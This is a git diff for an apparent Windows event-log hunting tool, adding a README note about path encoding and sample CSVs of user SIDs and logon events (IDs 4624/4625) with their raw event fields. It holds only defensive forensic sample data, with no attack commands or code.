diff --git a/README.md b/README.md
index caf4ef0..68c4643 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
# apt-hunter
-
+- When you upload the file path depth of 2 or more layers, please be sure to note that the file upload path '/' will be translated into the url '%2F' which will create a new folder! Be sure to pay attention!
+- 当你上传的文件路径深度在2层及以上时,请一定要注意文件上传路径'/' 会被url 翻译为 '%2F' 这样会新建一个文件夹!一定要注意!
\ No newline at end of file
diff --git a/source/samples/EventID_Frequency_Analysis.xls b/source/samples/EventID_Frequency_Analysis.xls
new file mode 100644
index 0000000..881d74b
Binary files /dev/null and b/source/samples/EventID_Frequency_Analysis.xls differ
diff --git a/source/samples/Sample_Collected-SIDS.csv b/source/samples/Sample_Collected-SIDS.csv
new file mode 100644
index 0000000..4428ecd
--- /dev/null
+++ b/source/samples/Sample_Collected-SIDS.csv
@@ -0,0 +1,19 @@
+User,SID
+01566S-WIN16-IR$,S-1-5-18
+ANONYMOUS LOGON,S-1-5-7
+IEUser,S-1-5-21-3461203602-4096304019-2269080069-1000
+Administrator,S-1-5-21-308926384-506822093-3341789130-500
+samir,S-1-5-21-308926384-506822093-3341789130-220106
+02694W-WIN10$,S-1-5-21-308926384-506822093-3341789130-84104
+Administrator,S-1-5-21-81107902-1099128984-1836738286-500
+EXCHANGE$,S-1-5-21-2895268558-4179327395-2773671012-1108
+IEUser,S-1-5-21-3583694148-1414552638-2922671848-1000
+lgrove,S-1-5-21-308926384-506822093-3341789130-101606
+a-jbrown,S-1-5-21-308926384-506822093-3341789130-1106
+user01,S-1-5-21-1587066498-1489273250-1035260531-1106
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+Administrator,S-1-5-21-1587066498-1489273250-1035260531-500
+sshd_server,S-1-5-21-3583694148-1414552638-2922671848-1002
+LOCAL SERVICE,S-1-5-19
+NETWORK SERVICE,S-1-5-20
+admin01,S-1-5-21-1587066498-1489273250-1035260531-1108
diff --git a/source/samples/Sample_Logon_Events.csv b/source/samples/Sample_Logon_Events.csv
new file mode 100644
index 0000000..b0b9d60
--- /dev/null
+++ b/source/samples/Sample_Logon_Events.csv
@@ -0,0 +1,13814 @@
+Date and Time,timestamp,Event ID,Account Name,Account Domain,Logon Type,Logon Process,Source IP,Workstation Name,Computer Name,Channel,Original Event Log
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769798
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x85516e
+ 3
+ Kerberos
+ Kerberos
+ -
+ 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 53668
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769794
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x853237
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49959
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769798
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x85516e
+ 3
+ Kerberos
+ Kerberos
+ -
+ 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 53668
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769794
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x853237
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49959
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
